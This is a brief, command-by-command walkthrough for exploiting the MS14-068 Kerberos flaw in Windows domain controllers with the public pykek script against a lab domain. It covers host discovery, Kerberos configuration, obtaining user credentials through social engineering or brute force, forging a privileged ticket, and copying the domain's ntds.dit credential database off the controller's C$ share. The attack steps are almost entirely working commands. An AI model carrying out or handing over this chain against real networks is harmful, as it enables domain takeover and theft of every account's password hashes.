MS Hot Fix https://technet.microsoft.com/en-us/library/security/ms14-068.aspx Step 1 - Determine DC Location and DNS server nmap -p53,88 10.2.1.100-101 -sT -sU Step 2 -Install Kerberos Tools apt-get install krb5-user cifs-utils git *this will issue step-up, for this example simply ok GUI with blanks Step 3 - Determine time on DC, for ticket sync net time -S 10.2.1.100 -U "" * gotta be within 5 minutes as per RFC, yet +-30 minutes skews may still work Step 4 Edit /etc/krb5.conf In this examples case... default_realm = WIN2K3.BOOBOOWARE.LOCAL dns_lookup_realm = true dns_lookup_kdc = true [realms] BOOBOOWARE.LOCAL = { kdc = Win2k3.boobooware.local:88 kdc = Win2k8.boobooware.local:88 admin_server=Win2k3.boobooware.local default_domain=boobooware.local } [domain_realm] .boobooware.local = BOOBOOWARE.LOCAL boobooware.local = BOOBOOWARE.LOCAL Step 5 Edit /etc/hosts and /etc/resolv.conf /etc/hosts - add anywhere 10.2.1.100 win2k3.boobooware.local win2k3 10.2.1.101 win2k8.boobooware.local win2k8 /etc/resolv.conf -add to top nameserver 10.2.1.100 Step 6 - get user creds.... (kinda important) social engineer, brute force, passive collect.. *in my case, I have an account called user1 Step 7 test kerberos authentication kinit USER1@BOOBOOWARE.LOCAL * no errors means it works, ALL UPPPERCASE Step 8 -get ms014-068 exploit from bidord aka Sylvain Monné (Thanks!!!) git clone https://github.com/bidord/pykek.git Step 9 get sid for user, exploit needs it rpcclient -U "" 10.2.1.100 lookupnames user1 * no null sessions, just use the creds, copy SID Step 10 Run Exploit (Told ya 10 Steps!) cd pykek python ms14-068.py -u user1@boobooware.local -s S-1-5-21-2505418965-2701690409-4286734078-1115 -d win2k3.boobooware.local *Boom! Step 11 Move modified cached creds to kerberos cached creds, look for TGT*.ccache mv TGT_user1@boobooware.local.ccache /tmp/krb5cc_0 Step 12 Connect to known share on victim DC smbclient -W BOOBOOWARE.LOCAL //win2k3/c$ -k get WINDOWS\SYSTEM32\ntds.dit ntds.dit